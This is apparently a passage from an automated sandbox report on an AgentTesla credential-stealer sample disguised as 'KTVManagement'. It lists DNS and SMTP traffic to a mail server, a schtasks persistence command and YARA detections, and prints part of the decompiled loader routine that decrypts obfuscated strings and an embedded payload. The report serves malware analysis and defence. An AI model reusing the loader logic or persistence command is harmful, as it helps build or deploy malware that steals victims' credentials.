LegalTrademarks |
Comments |
ProductName | KTVManagement
ProductVersion | 3.0.0.0
FileDescription | KTVManagement
OriginalFilename | ObjectIDGenerator.exe

                                                                                                            Network Behavior

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets


                                                                                                            UDP Packets


                                                                                                            DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 25, 2021 12:17:51.249157906 CET | 192.168.2.4 | 8.8.8.8 | 0x224b | Standard query (0) | us2.smtp.mailhostbox.com | A (IP address) | IN (0x0001)
Feb 25, 2021 12:17:52.108124971 CET | 192.168.2.4 | 8.8.8.8 | 0x286d | Standard query (0) | us2.smtp.mailhostbox.com | A (IP address) | IN (0x0001)

                                                                                                            DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 25, 2021 12:17:51.313503027 CET | 8.8.8.8 | 192.168.2.4 | 0x224b | No error (0) | us2.smtp.mailhostbox.com | | 208.91.198.143 | A (IP address) | IN (0x0001)
Feb 25, 2021 12:17:51.313503027 CET | 8.8.8.8 | 192.168.2.4 | 0x224b | No error (0) | us2.smtp.mailhostbox.com | | 208.91.199.223 | A (IP address) | IN (0x0001)
Feb 25, 2021 12:17:51.313503027 CET | 8.8.8.8 | 192.168.2.4 | 0x224b | No error (0) | us2.smtp.mailhostbox.com | | 208.91.199.225 | A (IP address) | IN (0x0001)
Feb 25, 2021 12:17:51.313503027 CET | 8.8.8.8 | 192.168.2.4 | 0x224b | No error (0) | us2.smtp.mailhostbox.com | | 208.91.199.224 | A (IP address) | IN (0x0001)
Feb 25, 2021 12:17:52.169742107 CET | 8.8.8.8 | 192.168.2.4 | 0x286d | No error (0) | us2.smtp.mailhostbox.com | | 208.91.199.224 | A (IP address) | IN (0x0001)
Feb 25, 2021 12:17:52.169742107 CET | 8.8.8.8 | 192.168.2.4 | 0x286d | No error (0) | us2.smtp.mailhostbox.com | | 208.91.199.223 | A (IP address) | IN (0x0001)
Feb 25, 2021 12:17:52.169742107 CET | 8.8.8.8 | 192.168.2.4 | 0x286d | No error (0) | us2.smtp.mailhostbox.com | | 208.91.199.225 | A (IP address) | IN (0x0001)
Feb 25, 2021 12:17:52.169742107 CET | 8.8.8.8 | 192.168.2.4 | 0x286d | No error (0) | us2.smtp.mailhostbox.com | | 208.91.198.143 | A (IP address) | IN (0x0001)

                                                                                                            SMTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Feb 25, 2021 12:17:52.132086992 CET | 587 | 49767 | 208.91.198.143 | 192.168.2.4 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Feb 25, 2021 12:17:52.903023958 CET | 587 | 49769 | 208.91.199.224 | 192.168.2.4 | 220 us2.outbound.mailhostbox.com ESMTP Postfix

                                                                                                            Code Manipulations

                                                                                                            System Behavior

                                                                                                            General

Start time: 12:16:15
Start date: 25/02/2021
Path: C:\Users\user\Desktop\4019223246.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\4019223246.exe'
Imagebase: 0x850000
File size: 981504 bytes
MD5 hash: 87E6882BCEBF4823AFB4303AAC3628B1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.658704693.0000000002C41000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

                                                                                                            General

Start time: 12:16:19
Start date: 25/02/2021
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WZXjvtGBEKK' /XML 'C:\Users\user\AppData\Local\Temp\tmp35E.tmp'
Imagebase: 0x970000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                            General

Start time: 12:16:19
Start date: 25/02/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                            General

Start time: 12:16:20
Start date: 25/02/2021
Path: C:\Users\user\Desktop\4019223246.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\4019223246.exe
Imagebase: 0x460000
File size: 981504 bytes
MD5 hash: 87E6882BCEBF4823AFB4303AAC3628B1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.913312856.0000000002ED4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.914172803.0000000003E21000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.914560852.0000000004FE0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000003.657508762.0000000000BE4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.912388878.00000000025A2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.912715120.00000000029F0000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

                                                                                                            Disassembly

                                                                                                            Code Analysis

                                                                                                              Executed Functions

                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 012FC87E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658306370.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false

                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 012FE80A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658306370.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false

                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 012FE80A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658306370.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false

                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012F7A4F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658306370.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false

                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012F7A4F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658306370.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false

                                                                                                              APIs
                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012FC8F9,00000800,00000000,00000000), ref: 012FCB0A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658306370.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false

                                                                                                              APIs
                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012FC8F9,00000800,00000000,00000000), ref: 012FCB0A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658306370.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false

                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 012FC87E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658306370.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false

                                                                                                              APIs
                                                                                                              • SetWindowLongW.USER32(?,?,?), ref: 012FE99D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658306370.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: LongWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 1378638983-0
                                                                                                              • Opcode ID: 09995946ae162e5302370cac2b8edf0323740b82e2b1e764b2259b9f58ea4bd6
                                                                                                              • Instruction ID: 8cc97f113357fafd40e7e4300891350150730c70acfc581f0e89ce053e0609c4
                                                                                                              • Opcode Fuzzy Hash: 09995946ae162e5302370cac2b8edf0323740b82e2b1e764b2259b9f58ea4bd6
                                                                                                              • Instruction Fuzzy Hash: 131103B58002099FDB10CF99D488BDEFBF8FB48324F14841AE958A3340C3B4A944CFA1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • SetWindowLongW.USER32(?,?,?), ref: 012FE99D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658306370.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: LongWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 1378638983-0
                                                                                                              • Opcode ID: 2d0ee88d853c65d9c28d02a72546300cbd74912d495b7f820d258820c5f7019f
                                                                                                              • Instruction ID: 6c870c238698fd8d10f626b10051d6b48e4dd477dc44ab8b3c515ec6c20580a2
                                                                                                              • Opcode Fuzzy Hash: 2d0ee88d853c65d9c28d02a72546300cbd74912d495b7f820d258820c5f7019f
                                                                                                              • Instruction Fuzzy Hash: 8F11E2B59002099FDB20CF99D588BDEFBF8FB49324F15841AE959A7740C3B4A944CFA1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Non-executed Functions

                                                                                                              Executed Functions

                                                                                                              C-Code - Quality: 72%
                                                                                                              			E00401980(void* __edx, void* __eflags) {
                                                                                                              				char _v528;
                                                                                                              				char _v532;
                                                                                                              				void* _v556;
                                                                                                              				void* _v560;
                                                                                                              				void* _v564;
                                                                                                              				char _v816;
                                                                                                              				char _v820;
                                                                                                              				char _v840;
                                                                                                              				intOrPtr _v844;
                                                                                                              				char _v852;
                                                                                                              				char _v876;
                                                                                                              				char _v916;
                                                                                                              				char _v948;
                                                                                                              				char _v980;
                                                                                                              				char _v984;
                                                                                                              				char _v1012;
                                                                                                              				char _v1016;
                                                                                                              				char _v1048;
                                                                                                              				intOrPtr _v1052;
                                                                                                              				void* _v1056;
                                                                                                              				char _v1057;
                                                                                                              				char _v1058;
                                                                                                              				char _v1059;
                                                                                                              				char _v1060;
                                                                                                              				char _v1061;
                                                                                                              				char _v1062;
                                                                                                              				char _v1063;
                                                                                                              				char _v1064;
                                                                                                              				char _v1065;
                                                                                                              				char _v1066;
                                                                                                              				char _v1067;
                                                                                                              				char _v1068;
                                                                                                              				char _v1069;
                                                                                                              				char _v1070;
                                                                                                              				char _v1071;
                                                                                                              				char _v1072;
                                                                                                              				char _v1073;
                                                                                                              				char _v1074;
                                                                                                              				char _v1075;
                                                                                                              				char _v1076;
                                                                                                              				char _v1077;
                                                                                                              				char _v1078;
                                                                                                              				char _v1079;
                                                                                                              				void* _v1080;
                                                                                                              				char _v1081;
                                                                                                              				char _v1082;
                                                                                                              				char _v1083;
                                                                                                              				char _v1084;
                                                                                                              				char _v1085;
                                                                                                              				char _v1086;
                                                                                                              				char _v1087;
                                                                                                              				char _v1088;
                                                                                                              				char _v1092;
                                                                                                              				char _v1096;
                                                                                                              				CHAR* _v1100;
                                                                                                              				struct HRSRC__* _v1104;
                                                                                                              				signed int _v1108;
                                                                                                              				int _v1112;
                                                                                                              				int _v1116;
                                                                                                              				signed int _v1120;
                                                                                                              				CHAR* _v1124;
                                                                                                              				char _v1125;
                                                                                                              				char _v1126;
                                                                                                              				char _v1127;
                                                                                                              				char _v1128;
                                                                                                              				char _v1129;
                                                                                                              				char _v1130;
                                                                                                              				char _v1131;
                                                                                                              				char _v1132;
                                                                                                              				char _v1133;
                                                                                                              				char _v1134;
                                                                                                              				char _v1135;
                                                                                                              				void* _v1136;
                                                                                                              				char _v1137;
                                                                                                              				char _v1138;
                                                                                                              				char _v1139;
                                                                                                              				int _v1140;
                                                                                                              				char _v1141;
                                                                                                              				char _v1142;
                                                                                                              				char _v1143;
                                                                                                              				void* _v1144;
                                                                                                              				char _v1145;
                                                                                                              				char _v1146;
                                                                                                              				char _v1147;
                                                                                                              				void* _v1148;
                                                                                                              				char _v1149;
                                                                                                              				char _v1150;
                                                                                                              				char _v1151;
                                                                                                              				char _v1152;
                                                                                                              				char _v1153;
                                                                                                              				char _v1154;
                                                                                                              				char _v1155;
                                                                                                              				char _v1156;
                                                                                                              				char _v1157;
                                                                                                              				char _v1158;
                                                                                                              				char _v1159;
                                                                                                              				char _v1160;
                                                                                                              				char _v1161;
                                                                                                              				char _v1162;
                                                                                                              				char _v1163;
                                                                                                              				char _v1164;
                                                                                                              				char _v1168;
                                                                                                              				intOrPtr* _v1176;
                                                                                                              				char _v1180;
                                                                                                              				char _v1188;
                                                                                                              				intOrPtr* _v1192;
                                                                                                              				intOrPtr* _v1212;
                                                                                                              				intOrPtr* _v1248;
                                                                                                              				intOrPtr* _v1260;
                                                                                                              				intOrPtr* _v1264;
                                                                                                              				void* __ebx;
                                                                                                              				void* __edi;
                                                                                                              				void* __esi;
                                                                                                              				void* __ebp;
                                                                                                              				void* _t338;
                                                                                                              				void* _t341;
                                                                                                              				int _t342;
                                                                                                              				intOrPtr* _t350;
                                                                                                              				int _t351;
                                                                                                              				long _t353;
                                                                                                              				signed int _t355;
                                                                                                              				intOrPtr* _t359;
                                                                                                              				long _t360;
                                                                                                              				struct HINSTANCE__* _t366;
                                                                                                              				CHAR* _t367;
                                                                                                              				int _t370;
                                                                                                              				intOrPtr _t371;
                                                                                                              				int _t372;
                                                                                                              				intOrPtr* _t373;
                                                                                                              				void* _t380;
                                                                                                              				intOrPtr* _t383;
                                                                                                              				intOrPtr* _t384;
                                                                                                              				intOrPtr* _t387;
                                                                                                              				intOrPtr* _t388;
                                                                                                              				int _t389;
                                                                                                              				intOrPtr* _t393;
                                                                                                              				intOrPtr* _t397;
                                                                                                              				intOrPtr* _t398;
                                                                                                              				long _t401;
                                                                                                              				intOrPtr _t402;
                                                                                                              				intOrPtr _t403;
                                                                                                              				long _t409;
                                                                                                              				intOrPtr _t410;
                                                                                                              				intOrPtr _t411;
                                                                                                              				intOrPtr* _t419;
                                                                                                              				int _t421;
                                                                                                              				int _t422;
                                                                                                              				intOrPtr* _t423;
                                                                                                              				intOrPtr* _t426;
                                                                                                              				void* _t433;
                                                                                                              				int _t434;
                                                                                                              				int _t436;
                                                                                                              				intOrPtr* _t440;
                                                                                                              				int _t442;
                                                                                                              				int _t445;
                                                                                                              				int _t447;
                                                                                                              				int _t448;
                                                                                                              				int _t450;
                                                                                                              				CHAR* _t452;
                                                                                                              				char _t453;
                                                                                                              				intOrPtr* _t455;
                                                                                                              				intOrPtr* _t457;
                                                                                                              				signed int _t462;
                                                                                                              				intOrPtr* _t476;
                                                                                                              				intOrPtr _t496;
                                                                                                              				intOrPtr* _t497;
                                                                                                              				intOrPtr* _t499;
                                                                                                              				intOrPtr* _t501;
                                                                                                              				intOrPtr _t502;
                                                                                                              				void* _t503;
                                                                                                              				struct HRSRC__* _t506;
                                                                                                              				int _t517;
                                                                                                              				intOrPtr* _t528;
                                                                                                              				int _t530;
                                                                                                              				int _t532;
                                                                                                              				int _t534;
                                                                                                              				int _t535;
                                                                                                              				int _t536;
                                                                                                              				int _t537;
                                                                                                              				void* _t538;
                                                                                                              				struct HRSRC__* _t539;
                                                                                                              				intOrPtr* _t540;
                                                                                                              				void* _t542;
                                                                                                              				void* _t543;
                                                                                                              				void* _t544;
                                                                                                              				void* _t545;
                                                                                                              				intOrPtr* _t546;
                                                                                                              				intOrPtr* _t547;
                                                                                                              				void* _t548;
                                                                                                              				intOrPtr* _t549;
                                                                                                              				intOrPtr* _t550;
                                                                                                              				intOrPtr* _t551;
                                                                                                              				struct HINSTANCE__* _t552;
                                                                                                              				void* _t553;
                                                                                                              				void* _t560;
                                                                                                              				void* _t562;
                                                                                                              				void* _t566;
                                                                                                              				void* _t567;
                                                                                                              				intOrPtr* _t568;
                                                                                                              				void* _t570;
                                                                                                              				void* _t571;
                                                                                                              				void* _t572;
                                                                                                              
                                                                                                              				_t572 = __eflags;
                                                                                                              				_t503 = __edx;
                                                                                                              				__imp__OleInitialize(0); // executed
                                                                                                              				_v1156 = 0xe0;
                                                                                                              				_v1155 = 0x3b;
                                                                                                              				_v1154 = 0x8d;
                                                                                                              				_v1153 = 0x2a;
                                                                                                              				_v1152 = 0xa2;
                                                                                                              				_v1151 = 0x2a;
                                                                                                              				_v1150 = 0x2a;
                                                                                                              				_v1149 = 0x41;
                                                                                                              				_v1148 = 0xd3;
                                                                                                              				_v1147 = 0x20;
                                                                                                              				_v1146 = 0x64;
                                                                                                              				_v1145 = 6;
                                                                                                              				_v1144 = 0x8a;
                                                                                                              				_v1143 = 0xf7;
                                                                                                              				_v1142 = 0x3d;
                                                                                                              				_v1141 = 0x9d;
                                                                                                              				_v1140 = 0xd9;
                                                                                                              				_v1139 = 0xee;
                                                                                                              				_v1138 = 0x15;
                                                                                                              				_v1137 = 0x68;
                                                                                                              				_v1136 = 0xf4;
                                                                                                              				_v1135 = 0x76;
                                                                                                              				_v1134 = 0xb9;
                                                                                                              				_v1133 = 0x34;
                                                                                                              				_v1132 = 0xbf;
                                                                                                              				_v1131 = 0x1e;
                                                                                                              				_v1130 = 0xe7;
                                                                                                              				_v1129 = 0x78;
                                                                                                              				_v1128 = 0x98;
                                                                                                              				_v1127 = 0xe9;
                                                                                                              				_v1126 = 0x6f;
                                                                                                              				_v1125 = 0xb4;
                                                                                                              				_v1124 = 0;
                                                                                                              				_push(E00401650( &_v1156,  &_v876));
                                                                                                              				_t338 = E0040B95E(0xd3, _t503, _t538, _t543, _t572);
                                                                                                              				_t560 =  &_v1152 + 0xc;
                                                                                                              				if(_t338 == "0x1") {
                                                                                                              					L102:
                                                                                                              					__eflags = 0;
                                                                                                              					return 0;
                                                                                                              				} else {
                                                                                                              					_t341 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                                                                                                              					_t544 = _t341;
                                                                                                              					_v556 = 0x224;
                                                                                                              					_v1088 = 0xce;
                                                                                                              					_v1087 = 0x27;
                                                                                                              					_v1086 = 0x9c;
                                                                                                              					_v1085 = 0x1a;
                                                                                                              					_v1084 = 0x95;
                                                                                                              					_v1083 = 0x2e;
                                                                                                              					_v1082 = 0x22;
                                                                                                              					_v1081 = 0x57;
                                                                                                              					_v1080 = 0x91;
                                                                                                              					_v1079 = 0x21;
                                                                                                              					_v1078 = 0x57;
                                                                                                              					_v1077 = 0x3a;
                                                                                                              					_v1076 = 0xf8;
                                                                                                              					_v1075 = 0x98;
                                                                                                              					_v1074 = 0x5b;
                                                                                                              					_v1073 = 0xf4;
                                                                                                              					_v1072 = 0xb5;
                                                                                                              					_v1071 = 0x87;
                                                                                                              					_v1070 = 0x7b;
                                                                                                              					_v1069 = 0xf;
                                                                                                              					_v1068 = 0xf4;
                                                                                                              					_v1067 = 0x76;
                                                                                                              					_v1066 = 0xb9;
                                                                                                              					_v1065 = 0x34;
                                                                                                              					_v1064 = 0xbf;
                                                                                                              					_v1063 = 0x1e;
                                                                                                              					_v1062 = 0xe7;
                                                                                                              					_v1061 = 0x78;
                                                                                                              					_v1060 = 0x98;
                                                                                                              					_v1059 = 0xe9;
                                                                                                              					_v1058 = 0x6f;
                                                                                                              					_v1057 = 0xb4;
                                                                                                              					_v1056 = 0;
                                                                                                              					_v1160 = 0xc0;
                                                                                                              					_v1159 = 0x38;
                                                                                                              					_v1158 = 0x8d;
                                                                                                              					_v1157 = 0x1f;
                                                                                                              					_v1156 = 0x8e;
                                                                                                              					_v1155 = 0x30;
                                                                                                              					_v1154 = 0x65;
                                                                                                              					_v1153 = 0x47;
                                                                                                              					_v1152 = 0xd3;
                                                                                                              					_v1151 = 0x29;
                                                                                                              					_v1150 = 0x3b;
                                                                                                              					_v1149 = 0x56;
                                                                                                              					_v1148 = 0xf8;
                                                                                                              					_v1147 = 0x98;
                                                                                                              					_v1146 = 0x5b;
                                                                                                              					_v1145 = 0xf4;
                                                                                                              					_v1144 = 0xb5;
                                                                                                              					_v1143 = 0x87;
                                                                                                              					_v1142 = 0x7b;
                                                                                                              					_v1141 = 0xf;
                                                                                                              					_v1140 = 0xf4;
                                                                                                              					_v1139 = 0x76;
                                                                                                              					_v1138 = 0xb9;
                                                                                                              					_v1137 = 0x34;
                                                                                                              					_v1136 = 0xbf;
                                                                                                              					_v1135 = 0x1e;
                                                                                                              					_v1134 = 0xe7;
                                                                                                              					_v1133 = 0x78;
                                                                                                              					_v1132 = 0x98;
                                                                                                              					_v1131 = 0xe9;
                                                                                                              					_v1130 = 0x6f;
                                                                                                              					_v1129 = 0xb4;
                                                                                                              					_v1128 = 0;
                                                                                                              					_t342 = Module32First(_t544,  &_v556); // executed
                                                                                                              					if(_t342 == 0) {
                                                                                                              						L38:
                                                                                                              						FindCloseChangeNotification(_t544); // executed
                                                                                                              						_t552 = GetModuleHandleA(0);
                                                                                                              						_v1164 = 0xfc;
                                                                                                              						_v1163 = 0xb;
                                                                                                              						_v1162 = 0xff;
                                                                                                              						_v1161 = 0x75;
                                                                                                              						_v1160 = 0xe7;
                                                                                                              						_v1159 = 0x44;
                                                                                                              						_v1158 = 0x4b;
                                                                                                              						_v1157 = 0x23;
                                                                                                              						_v1156 = 0xbf;
                                                                                                              						_v1155 = 0x45;
                                                                                                              						_v1154 = 0x3b;
                                                                                                              						_v1153 = 0x56;
                                                                                                              						_v1152 = 0xf8;
                                                                                                              						_v1151 = 0x98;
                                                                                                              						_v1150 = 0x5b;
                                                                                                              						_v1149 = 0xf4;
                                                                                                              						_v1148 = 0xb5;
                                                                                                              						_v1147 = 0x87;
                                                                                                              						_v1146 = 0x7b;
                                                                                                              						_v1145 = 0xf;
                                                                                                              						_v1144 = 0xf4;
                                                                                                              						_v1143 = 0x76;
                                                                                                              						_v1142 = 0xb9;
                                                                                                              						_v1141 = 0x34;
                                                                                                              						_v1140 = 0xbf;
                                                                                                              						_v1139 = 0x1e;
                                                                                                              						_v1138 = 0xe7;
                                                                                                              						_v1137 = 0x78;
                                                                                                              						_v1136 = 0x98;
                                                                                                              						_v1135 = 0xe9;
                                                                                                              						_v1134 = 0x6f;
                                                                                                              						_v1133 = 0xb4;
                                                                                                              						_v1132 = 0;
                                                                                                              						_t539 = FindResourceA(_t552, E00401650( &_v1164,  &_v852), 0xa);
                                                                                                              						_v1104 = _t539;
                                                                                                              						_t545 = LoadResource(_t552, _t539);
                                                                                                              						_t452 = LockResource(_t545);
                                                                                                              						_t350 = E0040B80D(_t452,  &_v1164, _t539, SizeofResource(_t552, _t539)); // executed
                                                                                                              						_push(0x40022);
                                                                                                              						_t540 = _t350; // executed
                                                                                                              						_t351 = E0040AF26(_t452, _t540, __eflags); // executed
                                                                                                              						_t562 = _t560 + 0x10;
                                                                                                              						_v1100 = _t351;
                                                                                                              						__eflags = _t351;
                                                                                                              						if(_t351 == 0) {
                                                                                                              							_v1124 = 0;
                                                                                                              						} else {
                                                                                                              							E0040B9F0(_t540, _t351, 0, 0x40022);
                                                                                                              							_t562 = _t562 + 0xc;
                                                                                                              							_v1124 = _v1100;
                                                                                                              						}
                                                                                                              						E00401300(_v1124);
                                                                                                              						_t506 = _v1104;
                                                                                                              						_t353 = SizeofResource(_t552, _t506);
                                                                                                              						_v1120 = _t353;
                                                                                                              						asm("cdq");
                                                                                                              						_t507 = _t506 & 0x000003ff;
                                                                                                              						_t355 = _t353 + (_t506 & 0x000003ff) >> 0xa;
                                                                                                              						__eflags = _t355;
                                                                                                              						if(_t355 > 0) {
                                                                                                              							_v1100 = _t452;
                                                                                                              							_v1052 = _t540 - _t452;
                                                                                                              							_v1108 = _t355;
                                                                                                              							do {
                                                                                                              								_t436 = _v1100;
                                                                                                              								_push(_v1052 + _t436);
                                                                                                              								_push(0x400);
                                                                                                              								_push(_t436);
                                                                                                              								E00401560(_t452, _v1124);
                                                                                                              								_v1112 = _v1112 + 0x400;
                                                                                                              								_t177 =  &_v1120;
                                                                                                              								 *_t177 = _v1120 - 1;
                                                                                                              								__eflags =  *_t177;
                                                                                                              							} while ( *_t177 != 0);
                                                                                                              						}
                                                                                                              						_t462 = _v1120 & 0x800003ff;
                                                                                                              						__eflags = _t462;
                                                                                                              						if(_t462 < 0) {
                                                                                                              							_t462 = (_t462 - 0x00000001 | 0xfffffc00) + 1;
                                                                                                              							__eflags = _t462;
                                                                                                              						}
                                                                                                              						__eflags = _t462;
                                                                                                              						if(_t462 > 0) {
                                                                                                              							_t433 = _v1120 - _t462;
                                                                                                              							_t507 = _t433 + _t540;
                                                                                                              							_push(_t433 + _t540);
                                                                                                              							_push(_t462);
                                                                                                              							_t434 = _t433 + _t452;
                                                                                                              							__eflags = _t434;
                                                                                                              							_push(_t434);
                                                                                                              							E00401560(_t452, _v1124);
                                                                                                              						}
                                                                                                              						E0040B9F0(_t540, _t452, 0, _v1120);
                                                                                                              						FreeResource(_t545);
                                                                                                              						_t453 =  *_t540;
                                                                                                              						_v1048 = _t453;
                                                                                                              						_t359 = E0040B80D(_t453, _t507, _t540, _t453); // executed
                                                                                                              						_t546 = _t359;
                                                                                                              						_t360 = SizeofResource(_t552, _v1104);
                                                                                                              						_t186 = _t540 + 4; // 0x4
                                                                                                              						E0040AC10(_t546,  &_v1048, _t186, _t360);
                                                                                                              						E0040B9F0(_t540, _t540, 0, _v1120);
                                                                                                              						_t191 = _t546 + 0xe; // 0xe
                                                                                                              						_t553 = _t191;
                                                                                                              						_v1164 = 0xce;
                                                                                                              						_v1163 = 0x27;
                                                                                                              						_v1162 = 0x9c;
                                                                                                              						_v1161 = 0x1a;
                                                                                                              						_v1160 = 0x95;
                                                                                                              						_v1159 = 0x21;
                                                                                                              						_v1158 = 0x2e;
                                                                                                              						_v1157 = 0xd;
                                                                                                              						_v1156 = 0xdb;
                                                                                                              						_v1155 = 0x29;
                                                                                                              						_v1154 = 0x57;
                                                                                                              						_v1153 = 0x56;
                                                                                                              						_v1152 = 0xf8;
                                                                                                              						_v1151 = 0x98;
                                                                                                              						_v1150 = 0x5b;
                                                                                                              						_v1149 = 0xf4;
                                                                                                              						_v1148 = 0xb5;
                                                                                                              						_v1147 = 0x87;
                                                                                                              						_v1146 = 0x7b;
                                                                                                              						_v1145 = 0xf;
                                                                                                              						_v1144 = 0xf4;
                                                                                                              						_v1143 = 0x76;
                                                                                                              						_v1142 = 0xb9;
                                                                                                              						_v1141 = 0x34;
                                                                                                              						_v1140 = 0xbf;
                                                                                                              						_v1139 = 0x1e;
                                                                                                              						_v1138 = 0xe7;
                                                                                                              						_v1137 = 0x78;
                                                                                                              						_v1136 = 0x98;
                                                                                                              						_v1135 = 0xe9;
                                                                                                              						_v1134 = 0x6f;
                                                                                                              						_v1133 = 0xb4;
                                                                                                              						_v1132 = 0;
                                                                                                              						_t366 = LoadLibraryA(E00401650( &_v1164,  &_v916));
                                                                                                              						_v1164 = 0xe0;
                                                                                                              						_v1163 = 0x18;
                                                                                                              						_v1162 = 0xad;
                                                                                                              						_v1161 = 0x36;
                                                                                                              						_v1160 = 0x95;
                                                                                                              						_v1159 = 0x21;
                                                                                                              						_v1158 = 0x2a;
                                                                                                              						_v1157 = 0x57;
                                                                                                              						_v1156 = 0xda;
                                                                                                              						_v1155 = 0xc;
                                                                                                              						_v1154 = 0x55;
                                                                                                              						_v1153 = 0x25;
                                                                                                              						_v1152 = 0x8c;
                                                                                                              						_v1151 = 0xf9;
                                                                                                              						_v1150 = 0x35;
                                                                                                              						_v1149 = 0x97;
                                                                                                              						_v1148 = 0xd0;
                                                                                                              						_v1147 = 0x87;
                                                                                                              						_v1146 = 0x7b;
                                                                                                              						_v1145 = 0xf;
                                                                                                              						_v1144 = 0xf4;
                                                                                                              						_v1143 = 0x76;
                                                                                                              						_v1142 = 0xb9;
                                                                                                              						_v1141 = 0x34;
                                                                                                              						_v1140 = 0xbf;
                                                                                                              						_v1139 = 0x1e;
                                                                                                              						_v1138 = 0xe7;
                                                                                                              						_v1137 = 0x78;
                                                                                                              						_v1136 = 0x98;
                                                                                                              						_v1135 = 0xe9;
                                                                                                              						_v1134 = 0x6f;
                                                                                                              						_v1133 = 0xb4;
                                                                                                              						_v1132 = 0;
                                                                                                              						_t367 = E00401650( &_v1164,  &_v948);
                                                                                                              						_t566 = _t562 + 0x3c;
                                                                                                              						 *0x423480 = GetProcAddress(_t366, _t367);
                                                                                                              						_t542 = 0;
